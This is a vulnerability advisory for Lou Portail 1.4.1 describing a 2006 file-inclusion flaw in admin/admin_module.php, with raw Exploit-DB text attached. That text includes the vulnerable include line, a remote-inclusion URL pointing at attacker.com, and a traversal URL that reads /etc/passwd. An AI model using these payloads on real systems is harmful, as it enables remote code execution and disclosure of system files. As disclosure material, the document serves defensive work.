Lou Portail 1.4.1

vendor:

Lou Portail

by:

7,5

CVSS

HIGH

Remote|Local File Include Vulnerability

CWE

Product Name: Lou Portail

Affected Version From: 1.4.1

Affected Version To: 1.4.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'g_admin_rep' parameter in 'admin/admin_module.php' script. This can be exploited to include arbitrary files from local resources or remote resources by using a relative path in the 'g_admin_rep' parameter. Additionally, an attacker can exploit this vulnerability to include files with multiple extensions, which can be used to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has not released a patch to address this vulnerability. As a general security measure, users should keep all software up-to-date.

Source

Exploit-DB raw data:

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ Lou Portail 1.4.1 ]                               #
#                                                                
# Class:     Remote|Local File Include Vulnerability            #
# Patch:     Unavailable                                        #
# Published  2006/10/18                                         #
# Remote:    Yes                                                
# Local:     No                            			#
# Type:      High                                               #
# Site:      http://louportail.free.fr/                         #
# Author:    MP
# Contact:   mp01010@yahoo.com                    		#
#                                				#
#################################################################

Vuln Code (admin/admin_module.php):

<?...
  include ("$g_admin_rep/admin_utils.$g_ext");
...?>

#Vuln 1.0 -> require register_globals = On
http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.com&g_ext=txt

#Vuln 2.0 -> require magic_quotes_gpc = Off
http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../../../../../../../../../../../../../etc/passwd%00

# milw0rm.com [2006-10-20]